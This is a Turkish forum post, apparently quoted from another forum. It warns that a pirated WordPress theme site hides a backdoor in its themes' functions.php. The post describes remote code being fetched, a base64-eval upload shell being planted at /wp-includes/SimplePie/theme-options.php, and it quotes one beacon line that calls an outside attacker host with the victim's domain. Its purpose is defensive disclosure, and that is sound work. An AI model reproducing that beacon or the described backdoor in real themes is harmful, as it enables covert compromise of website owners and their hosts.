MESAJ *** ALINTIDIR ;

Merhaba arkadaşlar, *** bünyesinde ki birçok tema yapımcısının emeklerini hiç sayarak insanlara ücretsiz sunan ve wordpress tema aramalarında ilk sıralarda gelen bu sitenin ne denli büyük bir tuzak olduğunu hep beraber göreceğiz. Lütfen sabırlıca dikkatinizi vererek okuyunuz.

Neden w4rez kullanmamalıyız sorusunun cevabının; temaya emek veren insanların bütün hakkının gasedilmesinin yanı sıra temayı kullanan insanlar içinde nasıl bir tehdit olduğunu şimdi hep birlikte görelim. Bu sitede görmüş olduğunuz her tema sahiplerinin izni olmaksızın dosyalarının çekilip yayınlanmasından ibaret, öyle ki çok ciddi sayıda temayı bu sitede görebiliyoruz. Özellikle webmaster forumunda her insanın bu siteye girmiş olma ihtimali çok yüksek. Sadece w4rez anlamında değil daha warezin ne olduğunu bilmeyen insanların dahi bu siteye girip temaları indirmiş olma ihtimali çok yüksek. Şimdi burda yayınlanmış olan bütün temaların içine gizlenmiş olan kodlar ile bütün bilgilerinize, hostunuza nasıl erişim sağladıklarını bir inceleyelim.

Herhangi bir temayı indirip functions.php dosyasını inceledik.




Resimde kırmızı çerçeve içine aldığım kod ile uzaktaki bir txt dosyasının içindeki kodların sitenize uygulanması mümkün kılınmış. Şöyle ki bu linkteki adrese girdiğimiz zaman şöyle bir sonuç ile karşılaşıyoruz:



Php bilen arkadaşlar daha iyi bileceklerdir ki bu dosyanın içindeki kodlar ile "/wp-includes/SimplePie/" dizininin içine theme-options.php isimli bir dosya oluşturulmakta ve bu dosyanın içinide "val(base64_decode" şeklinde başlayan kodlar yerleştirilmektedir. Bu kodu decode edip incelediğimiz zaman bir tür upload formu ile karşılaşıyoruz, oda şu şekildedir:




Gördüğünüz upload formunu oluşturup bu form sayesinde sitenize istedikleri zararlı dosyayı yüklemeleri, sadece bu bahsi geçen siteden tema indirip onu aktif etmenize bakıyor. Bu kadar basite indirgenmiş bir sistem oluşturulmuş. Peki bunlar benim siteme onlardan indirdiğim temayı kurduğumu nasıl bielceklerde bana zarar verebilecekler diye düşünebilirsiniz. Oda şu şekilde mümkün kılınmış:

@file_get_contents("http://yakaladimsizi.com/panel/l.php?a=http://".$_SERVER['SERVER_NAME']);
Satırı sayesinde sitenizde oluşturulmuş olan formun linki bu insanların panelinde görünebiliyor, ve bugun kim temamızı indirip tuzağa düşmüş diye kontrol edebiliyorlar.

Bu temalardan 2 3 tanesini inceleme fırsatı bulabildim, kimilerinde bu şekilde functions.php dosyasına kolay bir yol ile eklenmiş, bazılarına ise daha karmaşık ve kuşku uyandırmayacak yollar ile aynı sistem entegre edilmiştir. Tek ortak nokta hepsinde "/wp-includes/SimplePie/theme-options.php" dizinine aynı isimle form oluşturulması şeklinde görürünüyor.

Şimdi bilenler olabilir, veya şuan öğreneceği üzere bu bir tür null vbulletin vakası gibi de düşünülebilir. Vbulletin indir kelimesinde yarışan ilk 3 4 siteninde buna benzer yollar ile sisteminize sehll atılması mümkün kılınmış ve bu yüzden bir çok siteye zarar verilmiştir. Aynı mantığın wordpress içinde geçerli olduğunu görüyoruz. Bu kendini zeki sanan arkadaşlar "wordpress tema indir", "wp tema indir", "ücretsiz tema indir" tarzı kelimelerde en üste çıkmak için seo çalışmaları yapıyor ve onlara güvenip w4rez olsun veya olmasın herhangi bir temayı indirdiğiniz zaman bu tür tuzaklara düşebiliyorsunuz.

O yüzden burda zaten w4rez tema kullanmış beterine uğrasın" demek doğru bir tepki olsada aslında w4rez temaya dair bilgisi olmayan sadece tema indirmek için indiren insanlarda olabilir, bu insanların hostunu siz sağlıyor olabilirsiniz. Veya bu insanların arkadaşı olabilirsiniz. Bilmeden kötü sonuçlar doğurabileceklerini göremeyebilirler. Burda sadece onlar değil sizlerde zarar görebilirsiniz. İşte bu yüzden bu tür tuzaklara düşmemeniz konusunda ayrıntılı olara bu konuyu açtım.

Her konuda olduğu gibi artık wordpress temaları konusunda da titiz davranmalı, hem başkalarının emeklerine konmaktan geri durmalı hemde 3 kuruş vermemk adına kendinizi yakmayı göze almamalısınız.

Bu sitenin sahibinin kim olduğuna dair bir araştırma yapıp, ***da kullandığı nickine ulaştığımı zannediyorum. Aramızda dolaşan aktif bir üye oalrak gördüm. Lakin kanıtlama konusunda yeterli delillere sahip olmadığım için bu konuda katiyen bişey söylemeyeceğim. Umarım bu konuya denk gelirse insan emeğine tecavüzün ve hak yemenin ne denli ağır bişey olduğunu aynısını yaşayarak geçde olsa anlayabilir.